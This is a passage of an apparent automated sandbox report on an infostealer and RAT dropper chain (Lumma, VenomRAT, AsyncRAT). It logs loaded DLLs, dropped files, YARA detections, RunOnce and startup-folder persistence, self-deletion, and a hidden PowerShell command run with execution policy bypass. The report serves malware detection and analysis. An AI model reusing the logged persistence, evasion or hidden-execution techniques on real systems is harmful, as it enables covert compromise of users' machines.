Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: msasn1.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\2D42.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Xml.ni.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: rust_dave_sideload.pdb source: vm.exe, 00000013.00000002.4123601062.000000006C8F8000.00000002.00000001.01000000.00000015.sdmp, lm.exe, 00000014.00000002.3069655853.000000006C888000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 0000001A.00000002.3227475624.000000006C8F8000.00000002.00000001.01000000.00000015.sdmp, g2m.dll0.14.dr
Source:	Binary string: System.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source:	Binary string: BitLockerToGo.pdb source: EF14.exe, 00000009.00000003.2540291593.000001FBFFEF0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C000800000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000003.2540539671.000001FBFFEB0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2560742888.000000C000400000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9E90000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdb) source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Xml.pdbMZ@ source: WER250C.tmp.dmp.29.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr
Source:	Binary string: BitLockerToGo.pdbGCTL source: EF14.exe, 00000009.00000003.2540291593.000001FBFFEF0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C000800000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000003.2540539671.000001FBFFEB0000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2560742888.000000C000400000.00000004.00001000.00020000.00000000.sdmp, EF14.exe, 00000009.00000002.2561692230.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: mscorlib.pdbl source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Xml.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER250C.tmp.dmp.29.dr
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 0000000E.00000002.2659328365.000001B9B9DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2659328365.000001B9B9E90000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000013.00000000.2626820511.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 00000013.00000002.4106639355.0000000000402000.00000002.00000001.01000000.00000013.sdmp, lm.exe, 00000014.00000002.3064617756.0000000000402000.00000002.00000001.01000000.00000014.sdmp, lm.exe, 00000014.00000000.2627426001.0000000000402000.00000002.00000001.01000000.00000014.sdmp, vm.exe, 0000001A.00000000.2764355472.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 0000001A.00000002.3104887965.0000000000402000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: System.Core.ni.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: mscorlib.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: mscorlib.ni.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Core.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.ni.pdb source: WER250C.tmp.dmp.29.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER250C.tmp.dmp.29.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 19.2.vm.exe.4e40000.1.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 26.2.vm.exe.4e30000.1.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Code function: 19_2_6C8D64F0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,

19_2_6C8D64F0

Source: 8EC7.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0xf4e19
Source: g2m.dll.14.dr	Static PE information: real checksum: 0x0 should be: 0x6caf9
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Static PE information: real checksum: 0xfa47 should be: 0xafb3
Source: g2m.dll0.14.dr	Static PE information: real checksum: 0x0 should be: 0x6caf9
Source: adjijwj.1.dr	Static PE information: real checksum: 0xfa47 should be: 0xafb3

Source: EF14.exe.1.dr

Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_00403230 push eax; ret	0_2_00403302
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Code function: 0_2_004026FF push ecx; ret	0_2_0040270B
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAC51C8 push ds; iretd	10_2_00007FFD9BAC5BDF
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAC00BD pushad ; iretd	10_2_00007FFD9BAC00C1
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAC0DFE push eax; retf	10_2_00007FFD9BAC0E1D
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAC0DD5 push eax; ret	10_2_00007FFD9BAC0DFD
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAC0DC0 push eax; ret	10_2_00007FFD9BAC0DFD
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BAC0D55 push eax; ret	10_2_00007FFD9BAC0DFD
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BBB23E1 push 8B485F90h; iretd	10_2_00007FFD9BBB23E6
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 10_2_00007FFD9BBB238C push 8B485F90h; iretd	10_2_00007FFD9BBB2391
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 12_2_00007FFD9BAB0DFE push eax; retf	12_2_00007FFD9BAB0E1D
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Code function: 12_2_00007FFD9BAB0DD5 push eax; ret	12_2_00007FFD9BAB0DFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BABF9AD pushad ; iretd	14_2_00007FFD9BABF9B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BABF948 push eax; ret	14_2_00007FFD9BABF951
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BABFFFE push esp; retf	14_2_00007FFD9BABFFFF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BAC5038 push eax; iretd	14_2_00007FFD9BAC50F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BAB3F7C push eax; iretd	14_2_00007FFD9BAB3F9A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BAC3F1B push ecx; retf 5E39h	14_2_00007FFD9BAC3F5C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BAB3EF2 push ecx; iretd	14_2_00007FFD9BAB3FFA
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8F63E1 push ecx; ret	19_2_6C8F63F4
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_05FF3D71 push ds; iretd	19_2_05FF3D7E
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_05FF1F93 push eax; iretd	19_2_05FF1FA2
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_05FF1F88 push eax; iretd	19_2_05FF1F92
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_05FF4EE1 push ebp; iretd	19_2_05FF4EEE
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_05FF20FF push ebp; iretd	19_2_05FF210A
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_05FF2089 push esp; iretd	19_2_05FF208A
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_05FF6831 push 6A4405FEh; iretd	19_2_05FF6836
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_05FF201C push ebx; iretd	19_2_05FF202A
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_05FF3B04 push eax; iretd	19_2_05FF3B0E
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C8863E1 push ecx; ret	20_2_6C8863F4

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Static PE information: section name: .text entropy: 7.062434505591146
Source: adjijwj.1.dr	Static PE information: section name: .text entropy: 7.062434505591146

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\EF14.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2D42.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\adjijwj	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\8EC7.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\adjijwj

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: Process Memory Space: vm.exe PID: 2484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vm.exe PID: 2004, type: MEMORYSTR

Creates autostart registry keys with suspicious names

Source: C:\Windows\explorer.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY

Jump to behavior

Drops VBS files to the startup folder

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY	Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY	Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY	Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\adjijwj:Zone.Identifier read attributes | delete

Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EF14.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
